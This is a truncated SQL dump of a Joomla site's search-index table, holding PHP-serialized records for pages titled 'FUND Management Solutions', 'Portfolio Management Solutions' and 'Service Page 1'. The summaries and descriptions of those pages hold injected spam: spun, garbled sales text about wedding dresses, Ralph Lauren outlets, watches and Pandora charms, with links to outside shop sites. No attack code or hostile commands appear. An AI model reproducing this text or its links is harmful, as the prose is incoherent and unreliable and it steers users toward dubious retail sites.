02:16:19','d767c1994a01d935a2aab6853081bfb2',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"125\";s:5:\"alias\";s:25:\"fund-management-solutions\";s:7:\"summary\";s:2253:\"<p>Discount wedding <b><a title=\"www.balfleet.com\" href=\"http://www.balfleet.com\">www.balfleet.com</a></b> prom bridesmiad gowns 2013 <br /><br />Promotion <b><a title=\"Flower Girl Dresses Australia\" href=\"http://www.balfleet.com/wedding-party-dresses/flower-girl-dresses.html\">Flower Girl Dresses Australia</a></b> wedding prom bridesmaid dresses 2013 <br /><br />Supply top sale bridal dresses, wedding dresses 2013, bridesmaid robes, blossom girl dresses, mother of the bridal dresses generate designer couture dresses prom dresses, quinceanera dresses, tropical drink dresses.Order around the today, available overall!<br /><br />There are thousands of choices and styles for all women on the eve of her marriage, prom dresses 2013 so making versatile and robust can seem impossible.If you want to be sure of being delighted by both the price and appearance of your gown, then looking through the collections at noondress can be a great way to kick off your search.Whether you\'re a wedding or just looking for a dress in one of these two iconic colors, use the collection we\'ve put together to consider all your options and pick the one that will show off your figure the best.<br /><br />The irregular in shape look, whether it manifests in the band, the dresses, short party dresses or other detail in our dresses, is in first place on the must have list of fashion criteria for many women this season!Wearing an asymmetrical dress can add something unexpected to your outfit, and specially when it comes to holding weddings in traditional settings while infusing them with the spirit of something funky and new, this info can be appreciated by younger brides and wedding participants.They\'re a way of adding today\'s truck owner to the wedding traditions you love!<br /><br />Ruching, tiered coatings of ruffles, prom dresses under $100 beautifully beadwork, and luxe textiles, are just some of things that make this collection of bridal gowns truly standout in the world of design.Many more and significantly, we add beautiful detailing to our designs, such as lace or adornments, to be able to our designs.In overall impression is one of elegance and class.You will be sure to look and feel your best on crucial day of your life.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-09 06:16:17\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"3\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:29:\"125:fund-management-solutions\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:77:\"index.php/services/fund/14-sample-data-articles/125-fund-management-solutions\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=125\";s:5:\"route\";s:115:\"index.php?option=com_content&view=article&id=125:fund-management-solutions&catid=14:sample-data-articles&Itemid=689\";s:5:\"title\";s:25:\"FUND Management Solutions\";s:11:\"description\";s:1976:\"Discount wedding www.balfleet.com prom bridesmiad gowns 2013 Promotion Flower Girl Dresses Australia wedding prom bridesmaid dresses 2013 Supply top sale bridal dresses, wedding dresses 2013, bridesmaid robes, blossom girl dresses, mother of the bridal dresses generate designer couture dresses prom dresses, quinceanera dresses, tropical drink dresses.Order around the today, available overall! There are thousands of choices and styles for all women on the eve of her marriage, prom dresses 2013 so making versatile and robust can seem impossible.If you want to be sure of being delighted by both the price and appearance of your gown, then looking through the collections at noondress can be a great way to kick off your search.Whether you\'re a wedding or just looking for a dress in one of these two iconic colors, use the collection we\'ve put together to consider all your options and pick the one that will show off your figure the best. The irregular in shape look, whether it manifests in the band, the dresses, short party dresses or other detail in our dresses, is in first place on the must have list of fashion criteria for many women this season!Wearing an asymmetrical dress can add something unexpected to your outfit, and specially when it comes to holding weddings in traditional settings while infusing them with the spirit of something funky and new, this info can be appreciated by younger brides and wedding participants.They\'re a way of adding today\'s truck owner to the wedding traditions you love! Ruching, tiered coatings of ruffles, prom dresses under $100 beautifully beadwork, and luxe textiles, are just some of things that make this collection of bridal gowns truly standout in the world of design.Many more and significantly, we add beautiful detailing toour designs, such as lace or adornments, to be able to our designs.In overall impression is one of elegance and class.You will be sure to look and feel your best on crucial day of your life.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(117,'index.php?option=com_content&view=article&id=124','index.php?option=com_content&view=article&id=124:portfolio-management-solutions&catid=14:sample-data-articles&Itemid=688','Portfolio Management Solutions','And sentira bradely to Polo Ralph Lauren Outlet abercromibe What is our youth arriving at?They have taken a term that used to spell it out classy, wealthy families and have and turned it into a term that describes teenagers that wear ripped up jeans and s','2015-06-11 02:19:11','176d74f0c84ac2e4ccb00abca01fc2b6',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"124\";s:5:\"alias\";s:30:\"portfolio-management-solutions\";s:7:\"summary\";s:4486:\"<p>And sentira bradely to <b><a title=\"Polo Ralph Lauren Outlet\" href=\"http://www.ycol.co.uk/ralph-lauren-uk-outlet.html\">Polo Ralph Lauren Outlet</a></b> abercromibe <br /><br />What is our youth arriving at?They have taken a term that used to spell it out classy, wealthy families and have and turned it into a term that describes teenagers that wear ripped up jeans and sandals.<br /><br />Revise 1:<br /><br />\"The word preppy has come to refer to opportunity seekers of a certain class, business status, and ethnic beginnings.Essentially, it is used to go into detail people from established wasp families, and is marked by controversy because it excludes people from other backgrounds.<br /><br />More mostly, preps are people who attended elite college basic schools, often boarding educational institutions.Strangely enough enough, the prep school attended is sometimes given more weight than the college this is why attended, however substantial the latter.Universites and colleges.It is worth noting that a school eliteness or cost doesn\'t imply that it is a preppy college.Preppy culture idealizes history, cleverness, athleticism, sociability and riches.The culture also highlights deference to business and certain fashions, <br /><br />Have you teenagers who call in your\"Preppy\"Have you been to the hamptons?Martha winery?<br /><br />Redesign <b><a title=\"Ralph Lauren Outlet:http://www.ycol.co.uk/\" href=\"http://www.ycol.co.uk\">Ralph Lauren Outlet:http://www.ycol.co.uk/</a></b> 2:<br /><br />\"Ready\"Not necessarily a trend.Before denote wealthy families.A new kennedys are preppy, rory gilmore can preppy.<br /><br />Anyone kept on misinterpreting the term preppy.Preppy is and is actually ralph lauren polo, and a top tied around your neck and diamond pattern vest.Ralph lauren is better scale then any thing in abercrombie, hollister.It sad that the term has degraded include things like af and hollister.<br /><br />View:Word and meanings changes in time to come.Like the concept gay.Just a short while ago gay use to mean happy and not homosexual like it does now.Or unfavorable ghetto, ghetto was just suppose to explain slum area were people of a certain background live.Then it was turn into to explain any urban area, no matter the mix like parts of nyc.Now its uses to describe a person or an issue that is loud, bad, and charge.<br /><br />But your right most teenagers concept of what preppy means.I was always of thebelief that preppy meant kids who dress for successes and got straight a until i found my self on y!A fabulous.Some positive can emerge from the term changing, the term not any longer glorify elitist.Not every one can be elitist see the top colleges, and tiring nice clothes.<br /><br />Abercrombie, hollister and coach might as\"Over priced\"But appears better, for me.I might only buy ralph lauren bedding items.<br /><br />Manner.In case you says\"Who likes you trend\"Along with\"So as long as i calm\"Well let me quote a line from film production company\"The devil might wear prada\"<br /><br />The idea.Ohio.Well.I look at, you think this is not to do with you.You go to your closet and you decide on out, oh i don realize that, that lumpy blue dress, including, because you trying to tell everyone around you that you take yourself too seriously to care about what you put on your back.But what you don know is that that sweater isn\'t blue, it not aqua blue, it as opposed to lapis, this job cerulean.You also blithely unaware that in 2002, oscar de la renta did an amount of cerulean gowns.And then it was yves st laurent, wasn they, who showed cerulean army jackets?And then cerulean quickly showed up in the ranges of 8 different designers.Then it filtered down through the the malls and then trickled on down into some tragic casual corner where you, surely, fished it out of some outdoor patio bin.Anyhow, that blue represents vast amounts and countless jobs and so it sort of comical how you think that you made a choice that exempts you from the fashion industry when, truthfully, you wearing the sweater that was selected for you by the public in this room.Due to pile of stuff.Meryl streep <br /><br />Or perhaps purchasing.Fashion wasn\'t meant to the less fortunate.It has and will be meant to the well off.They rest are copycats on exactly just what runway trends shows.Which may for the masses.As well as abercrombie and hollister thing?It not\"Fabulous\"Appears.Likewise as getting hanes with prints.Thanks to you.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-11 06:19:08\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"4\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:34:\"124:portfolio-management-solutions\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:97:\"index.php/services/portfoliomanagement/14-sample-data-articles/124-portfolio-management-solutions\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=124\";s:5:\"route\";s:120:\"index.php?option=com_content&view=article&id=124:portfolio-management-solutions&catid=14:sample-data-articles&Itemid=688\";s:5:\"title\";s:30:\"Portfolio Management Solutions\";s:11:\"description\";s:4110:\"And sentira bradely to Polo Ralph Lauren Outlet abercromibe What is our youth arriving at?They have taken a term that used to spell it out classy, wealthy families and have and turned it into a term that describes teenagers that wear ripped up jeans and sandals. Revise 1: \"The word preppy has come to refer to opportunity seekers of a certain class, business status, and ethnic beginnings.Essentially, it is used to go into detail people from established wasp families, and is marked by controversy because it excludes people from other backgrounds. More mostly, preps are people who attended elite college basic schools, often boarding educational institutions.Strangely enough enough, the prep school attended is sometimes given more weight than the college this is why attended, however substantial the latter.Universites and colleges.It is worth noting that a school eliteness or cost doesn\'t imply that it is a preppy college.Preppy culture idealizes history, cleverness, athleticism, sociability and riches.The culture also highlights deference to business and certain fashions, Have you teenagers who call in your\"Preppy\"Have you been to the hamptons?Martha winery? Redesign Ralph Lauren Outlet:http://www.ycol.co.uk/ 2: \"Ready\"Not necessarily a trend.Before denote wealthy families.A new kennedys are preppy, rory gilmore can preppy. Anyone kept on misinterpreting the term preppy.Preppy is and is actually ralph lauren polo, and a top tied around your neck and diamond pattern vest.Ralph lauren is better scale then any thing in abercrombie, hollister.It sad that the term has degraded include things like af and hollister. View:Word and meanings changes in time to come.Like the concept gay.Just a short while ago gay use to meanhappy and not homosexual like it does now.Or unfavorable ghetto, ghetto was just suppose to explain slum area were people of a certain background live.Then it was turn into to explain any urban area, no matter the mix like parts of nyc.Now its uses to describe a person or an issue that is loud, bad, and charge. But your right most teenagers concept of what preppy means.I was always of thebelief that preppy meant kids who dress for successes and got straight a until i found my self on y!A fabulous.Some positive can emerge from the term changing, the term not any longer glorify elitist.Not every one can be elitist see the top colleges, and tiring nice clothes. Abercrombie, hollister and coach might as\"Over priced\"But appears better, for me.I might only buy ralph lauren bedding items. Manner.In case you says\"Who likes you trend\"Along with\"So as long as i calm\"Well let me quote a line from film production company\"The devil might wear prada\" The idea.Ohio.Well.I look at, you think this is not to do with you.You go to your closet and you decide on out, oh i don realize that, that lumpy blue dress, including, because you trying to tell everyone around you that you take yourself too seriously to care about what you put on your back.But what you don know is that that sweater isn\'t blue, it not aqua blue, it as opposed to lapis, this job cerulean.You also blithely unaware that in 2002, oscar de la renta did an amount of cerulean gowns.And then it was yves st laurent, wasn they, who showed cerulean army jackets?And then cerulean quickly showed up in the ranges of 8 different designers.Then it filtered down through the the malls and then trickled on down into some tragic casual corner where you, surely, fished it out of some outdoor patio bin.Anyhow, that blue represents vast amounts and countless jobs and so it sort of comical how you think that you made a choice that exempts you from the fashion industry when, truthfully, you wearing the sweater that was selected for you by thepublic in this room.Due to pile of stuff.Meryl streep Or perhaps purchasing.Fashion wasn\'t meant to the less fortunate.It has and will be meant to the well off.They rest are copycats on exactly just what runway trends shows.Which may for the masses.As well as abercrombie and hollister thing?It not\"Fabulous\"Appears.Likewise as getting hanes with prints.Thanks to you.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(118,'index.php?option=com_content&view=article&id=91','index.php?option=com_content&view=article&id=91:service-page-1&catid=79:pages&Itemid=435','Service Page 1','Armani mens watch articles Armani mens watch articles Because the cost of purchasing quality materials, they are very pricey.With the usage quality watches, you won\'t only complement your outfit but also you will look really stylish and embellished.Austra','2015-06-15 03:36:01','f2f45a42255c61c020e226018e87aa4f',1,1,1,'en-GB','2013-12-10 08:19:04','0000-00-00 00:00:00','2013-12-10 08:19:04','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"91\";s:5:\"alias\";s:14:\"service-page-1\";s:7:\"summary\";s:2198:\"<p>Armani mens watch articles <br /><br />Armani mens watch articles <br /><br />Because the cost of purchasing quality materials, they are very pricey.With the usage quality watches, you won\'t only complement your outfit but also you will look really stylish and embellished.Australia has lots of watch dealers who supply the best watches produced by recognized manufacturers.Yet, the major problem in the matter of purchasing high.<br /><br />Sunglasses are and a fave of mine.Mall google deals an incredible.Secret fixation from calvin klein, armani code away due to giorgio armani, diesel\'s fragrance fuel for life infinite, benetton, forget sixty\'s skip, donna karan\'s dkny wonderful night, espirit with joy, estee lauder\'s parfum purely exotic.<br /><br />The top ten timex watches for men include the ironman shock solar 50 lap digital watch t5j641, t combination of racing black strap t2m552, gents alligator retrograde t2m422,.It has provided birth to the a lot of daring and vibrant iteration of michael kors watches that we get to see in the world today.It represents the flamboyant facet of this line and demonstrates that there is constantly new things to seem forward to.<br /><br />There are people who are so aware about their fashion that they tend to go for distinct brand names, shapes and kinds of vogue jam kw.A single java want a.<br /><br />Michael kors is a united states stylist and presently lives in new york urban <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> area.Michael kors bag brand has risen in appeal very fast throughout the last twelve month.Michael kors line aspects.No marvel michael kors goes to optimum of every lady\'s list as a fashion favorite.<br /><br />Skinny organizations are most picked now many with on <b><a title=\"Pandora Bracelets Canada\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Pandora Bracelets Canada</a></b> account of the slim match, white leading and thin the\"Mad adult adult males\"Fad that has actually overrun those who fashion company.If you do not intend to spent money on a trend that could perhaps not last after that this is the exc.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"79\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-15 07:36:00\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:2:\"57\";s:8:\"ordering\";s:1:\"6\";s:8:\"category\";s:5:\"Pages\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:17:\"91:service-page-1\";s:7:\"catslug\";s